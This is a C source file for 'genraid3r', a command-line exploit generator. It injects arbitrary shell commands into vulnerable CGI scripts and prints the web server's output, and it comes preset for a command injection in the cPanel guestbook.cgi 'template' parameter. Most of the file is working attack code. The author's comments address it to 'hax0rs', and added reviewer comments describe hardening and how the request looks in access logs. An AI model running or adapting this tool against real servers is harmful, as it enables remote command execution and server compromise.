Customizable CGI exploit generator that lets an engineer test standard, known CGI exploits from the command line, without a browser. The server's response is printed to STDOUT.
3eb298af0962a1ec44d0eb30d644bfef3f2f5da8fd6b0504d9d074903fab561d
/* Begin genraid3r.c */
/* By J0hny_Lightning */
/* j0hnylightning@hotmail.com */
/*
** genraid3r.c is a cgi exploit generator for
** lazy hax0rs who don't want to use the web
** browser to do their stuff. All u need to do
** is modify some of the strings and compile
** to get an exploit for whatever cgi vuln.
** It will execute your command on the web
** server and print the output to stdout.
** Tested on FreeBSD 4.6.
**
** The strings you will need to change are:
** 1) PATH This is the path to the vulnerable
** script. (ie: "/cgi-bin/forum/postit.cgi" )
**
** 2) PART_ONE This is a string that is the first series
** of arguments to the vulnerable script
** before the command is executed. For example
** if you are exploiting the cpanel
** guestbook.cgi you should set part_one to:
** "?user=cpanel&template=|"
**
** 3) PART_TWO This is a string that is the last series of
** arguments to be passed to the script after
** the command to be executed. Sticking with
** our example, part_two should be set to "|"
**
** Compile using: gcc genraid3r.c -o genraid3r
** Usage: ./genraid3r <hostname> <command>
**
** Note: If <command> contains a space, pass the
** URL-encoded (percent-encoded) form of the space
** character, since the program sends <command>
** unmodified. (ie: ls -al should be ls%20-al)
**
*/
/* Includes */
#include <stdio.h> // Standard includes for i/o,
#include <errno.h> // error reporting, and string
#include <string.h> // functions.
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h> // Standard includes for
#include <sys/socket.h> // networking functions.
#include <netinet/in.h>
#include <arpa/inet.h>
/* oO0OooO0OooO0Oo Change these defines! oO0OooO0OooO0Oo */
/*
 * Request template. main() sends the single line
 *   GET <PATH><PART_ONE><command><PART_TWO> \n\n
 * with no HTTP version token, where <command> is argv[2] verbatim.
 * For log review: with the values below, the request shows up as a hit on
 * the guestbook script whose "template" parameter value is wrapped in '|'
 * characters. Treat any such request in access logs as an attempted
 * command injection against that script.
 */
#define PATH "/cgi-sys/guestbook.cgi" /* Path to the script; first part of the request target */
#define PART_ONE "?user=cpanel&template=|" /* Query string placed before the command */
#define PART_TWO "|" /* Text placed after the command */
/* Changing anything below this line voids the warranty */
#define DEST_PORT 80 /* TCP port the request is sent to */
#define MAXBUF 1024 /* Size in bytes of the buffer main() uses for the request and for received data */
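/*
 * Build one GET request line from PATH, PART_ONE, argv[2] and PART_TWO,
 * send it to argv[1] on DEST_PORT, and copy the raw response to stdout.
 *
 * Usage: <prog> <host name> <command>
 *
 * Returns 0 once the peer closes the connection. Exits with status 1 on a
 * usage, request-size, lookup, socket, connect, send, receive or output
 * error.
 *
 * Notes for reviewers:
 *  - argv[2] goes into the request as-is; nothing here percent-encodes it.
 *  - argv[2] has arbitrary length while the request buffer is MAXBUF bytes,
 *    so the request is formatted with a bound and rejected if it would not
 *    fit, instead of being written past the end of the buffer.
 *  - The response is untrusted data from the remote host and is written to
 *    stdout byte-for-byte (it is never treated as a C string). Redirect it
 *    to a file or a pager that neutralises control sequences rather than
 *    reading it on a live terminal.
 */
int main(int argc, char *argv[]){
    int sock;
    int reqlen;
    size_t sent = 0;
    ssize_t nread;
    struct hostent *host;
    struct sockaddr_in addr;
    char request[MAXBUF];
    char reply[MAXBUF];

    if (argc != 3) {
        fprintf(stderr, "Usage: %s <host name> <command> \n", argv[0]);
        exit(1);
    }

    /* Format before touching the network so an oversized command fails
     * without opening a connection. snprintf never writes more than
     * sizeof request bytes; a return >= that size means truncation. */
    reqlen = snprintf(request, sizeof request, "GET %s%s%s%s \n\n",
                      PATH, PART_ONE, argv[2], PART_TWO);
    if (reqlen < 0 || (size_t)reqlen >= sizeof request) {
        fprintf(stderr, "request too long for %d-byte buffer\n", MAXBUF);
        exit(1);
    }

    if ((host = gethostbyname(argv[1])) == NULL) {
        herror("gethostbyname()");
        exit(1);
    }

    /* The resolver result sizes the copy below, so check that it really is
     * an IPv4 address of the size sin_addr can hold before copying. */
    if (host->h_addrtype != AF_INET ||
        host->h_length != (int)sizeof addr.sin_addr ||
        host->h_addr_list[0] == NULL) {
        fprintf(stderr, "gethostbyname(): no usable IPv4 address\n");
        exit(1);
    }

    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        perror("socket()");
        exit(1);
    }

    memset(&addr, 0, sizeof addr);
    addr.sin_family = AF_INET;
    addr.sin_port = htons(DEST_PORT);
    memcpy(&addr.sin_addr, host->h_addr_list[0], sizeof addr.sin_addr);

    if (connect(sock, (struct sockaddr *)&addr, sizeof addr) < 0) {
        perror("connect()");
        close(sock);
        exit(1);
    }

    fprintf(stdout, "Hey! Hey! Time for 0day...\n\n");
    fflush(stdout);

    /* send() may accept fewer bytes than asked; keep going until the whole
     * request is out, and stop on error instead of ignoring it. */
    while (sent < (size_t)reqlen) {
        ssize_t wrote = send(sock, request + sent, (size_t)reqlen - sent, 0);
        if (wrote <= 0) {
            perror("send()");
            close(sock);
            exit(1);
        }
        sent += (size_t)wrote;
    }

    /* Relay the response using the byte count recv() reported. The data is
     * not NUL-terminated, so it must not be printed with "%s". */
    for (;;) {
        nread = recv(sock, reply, sizeof reply, 0);
        if (nread < 0) {
            perror("recv()");
            close(sock);
            exit(1);
        }
        if (nread == 0) {
            break; /* peer closed the connection */
        }
        if (fwrite(reply, 1, (size_t)nread, stdout) != (size_t)nread) {
            perror("fwrite()");
            close(sock);
            exit(1);
        }
    }

    close(sock);
    return 0;
}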
/* End genraid3r.c */